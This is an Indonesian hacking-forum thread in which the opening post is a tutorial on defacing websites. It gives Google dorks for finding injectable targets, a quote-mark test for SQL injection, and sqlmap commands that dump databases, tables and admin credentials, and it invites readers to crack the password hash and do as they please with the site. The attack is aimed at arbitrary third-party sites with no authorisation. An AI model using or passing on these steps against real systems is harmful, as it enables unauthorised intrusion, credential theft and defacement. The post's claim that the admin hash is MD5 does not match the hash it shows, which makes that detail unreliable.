☣ Probolinggo Cyber Crew ☣



 
CalendarIndeksGalleryFAQPencarianAnggotaGroupPendaftaranLogin
Welcome
Top posters
Aurelya666 (35)
 
Mr.XSecr3t (23)
 
Tux|Anonymous (18)
 
M1nD-Fr34Kz (18)
 
C404_Cyber (17)
 
PCC_AKVL48 (13)
 
404.reboot (12)
 
wong deso (8)
 
"Ms.Green" (6)
 
izza_009 (5)
 
Latest topics
Pro-Cyber Crew
PCC Team
We Are Anonymous
free forum

User Yang Sedang Online
Total 2 uses online :: 0 Terdaftar, 0 Tersembunyi dan 2 Tamu

Tidak ada

User online terbanyak adalah 16 pada Thu Jan 01, 2015 10:15 am

Share | 
 

 Deface Dengan SQLMAP Python27

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Mr.XSecr3t
Family
Family
avatar

Jumlah posting : 23
Cendol : -1
Join date : 22.05.15
Age : 26
Lokasi : Unknown Syntax Error!'

PostSubyek: Deface Dengan SQLMAP Python27   Thu May 28, 2015 8:35 pm

Holla ...
Mau Post nih ... kalau ada yang blum ngerti tentang SQLMAP itu apa ....
sqlmap adalah suatu Program dimana kita bisa memanfaatkan kelemahan disuatu website dengan string (') :3 ...
lbih jelasnya cari di mbah google yak ..

oke ke TKP deh ....

1. siapin alat2nya dlu aj ...
1.SQLMAP download di http://sqlmap.org/download
2.Python27 download di http://python.org/download
3.mechanize .. download di sourceforge dengan keyword (mechanize sourceforge download

kalau sudah didownload semua ... pertama install dlu pythonnya di folder Local disk C:
kalau sudah di install lalu extract sqlmap dan mechanizenya (hanya databasenya yaa bukan zip/tar.gznya yg di extract ke python27 ...
setelah itu .. pergi ke file yang sudah di install tadi yakni python ... masuk ke filenya lalu ubah dlu nama sqlmap yg aturan sqlmap project ganti dengan sqlmap .. begitu jg mechanize ubah dari mechanize 2.4 jadi mechanize

2. setelah itu ente cari target dengan dork berikut :
inurl:/show.php?id= site:com
inurl:/article.php?id= site:com
inurl:/album.php?id= site:com
inurl:/news.php?id= site:com

dork diatas merupakan dork yg ampuh bagi saya ~ recomended silahkan dicoba :3 hnya situs yg ada angka dibelakang setelah = jadinya url target akan menjadi www.targetente.com/news.php?id=14 ...

3. kalau sudah dapat targetnya ... mari kita check vulnerability atau ga dengan cara tambahkan query string tanda petik (') ga pake tanda kurungnya yak ... hnya string petik ..
kalau ada tulisan ..

you have error in your sql syntax Error!!,check to your Corespondend ...
itu artinya VULN!!! kalau kembali ke index.. bkn berarti ga vuln tapi kemungkinan vuln hnya sekian persen .. bkn berarti ga bsa dideface dengan tekhnik ini ... Razz

4.setelah kita dapat targetnya ... mari kita eksekusi langsung ....
buka terminal/cmd ...
ketikkan perintah berikut cd C:/Python27/mechanize
sebelumnya install mechanize terlebih dahulu .. maka directorynya pindah jadi C:/Pyton27/mechanize ... setelah itu ketikkan perintah berikut : setup.py install maka akan terinstall dengan otomatis .. tunggu hingga selesai ...

5.jika sudah selesai tutup terminal dan buka kembali ...
ketikkan kembali perintah tadi cd C:/Python27/sqlmap
keterangan :
C: directory file yg tadi kita simpan python27 dan extract sqlmap dan mechanizenya .... Smile

6.setelah itu maka kita akan masuk ke directory sqlmap menjadi C:/python27/sqlmap :
7.kembali ke target ... kalau sudah ke directory mapnya ..
ketikkan kode berikut : sqlmap.py -u http://www.situstarget.com/news.php?id=15 --dbs
keterangan :
--dbs untuk memanggil/fetching database didalam server websitenya~
8.setelah itu maka akan ada 2/3 pilihan yakni sebagai berikut
semisal nama database targetnya adalah :
[*]Information_schema
[*]president_db
[*]user_db

9.nah maka dari itu kita coba fetching table dari user_db dengan mengetikkan perintah berikut ....
sqlmap.py -u http://www.situstarget.com/news.php?id=15 -D user_db --tables
keterangan :
-D adalah untuk menggali database yg tadi .. agar mendapatkan tables
--tables adalah fetching tables/memanggil tables yang ada di dalam database tadi ...
10.jika keluar semua tables semisal :
[*]user
[*]admin
[*]member
[*]news
[*]forum

11.maka setelah itu kita kira2 dimana ada username dan password adminnya ... jika sudah ketauan di tables admin yakni mengetik perintah berikut :
sqlmap.py -u http://www.targetkorban.com/news.php?id=15 -D user_db -T admin --column
keterangan :
-D adalah database awal yg tadi kita gali agar terhubung dengan tables dan column
-T adalah column yang tadi kita gali agar bisa memanggil column maka dibelakangnya ditambah perintah --column
12. naaah! keluar kan username dan password adminnya!
semisalkan seperti ini :
username | password
adminumb | $P$*&*&^)%$#%DF65391@&@

13.memang biasanya username dari admin suatu website berupa hash/MD5 maka dari itu kita CRACK MD5 password tersebut dan selesai deh Razz
CRACK Sendiri aja ~ usaha broo wkwkwkwk ...

sisanya terserah mau diapain deeh itu website .tapi ingat .. backup yak kalau domainnya .id soalnya negara sendiri ga baik looh Razz wkwk


Sekian tutor dari ane ~
kurang paham ?
COMENT!
Mau Copas?
SERTAKAN SUMBER!!!

[̲̅̅M̲̅][̲̅̅r̲̅][̲̅̅.̲̅][̲̅̅X̲̅][̲̅̅S̲̅][̲̅̅e̲̅][̲̅̅c̲̅][̲̅̅r̲̅][̲̅̅3̲̅][̲̅̅t̲̅]
Kembali Ke Atas Go down
Lihat profil user http://taufikict.blogspot.com
Aurelya666
Family
Family
avatar

Jumlah posting : 35
Cendol : 0
Join date : 26.08.15
Age : 37
Lokasi : Yogyakarta

PostSubyek: Re: Deface Dengan SQLMAP Python27   Wed Aug 26, 2015 5:17 pm

Basketball Basketball Basketball Basketball

_______________________________________________________________________________________
We Can Do What You Can't Do !!
Kembali Ke Atas Go down
Lihat profil user http://inj3ct0r666.blogspot.com/
 
Deface Dengan SQLMAP Python27
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» bercanda dengan LOGIKA
» bedanya ninja 250 dengan ninja 250 se
» HELP!!! beda MOTUL 5100 dengan MOTUL H-TECH
» WTA-Bedanya pake Open Filter dengan Replacement Air Filter
» [ASK] beda nya Master Rem Radial dengan yang Biasa

Permissions in this forum:Anda tidak dapat menjawab topik
☣ Probolinggo Cyber Crew ☣ :: Hacking , Cracking , dsb :: Hacking , Cracking , dsb :: Tutorials-
Navigasi: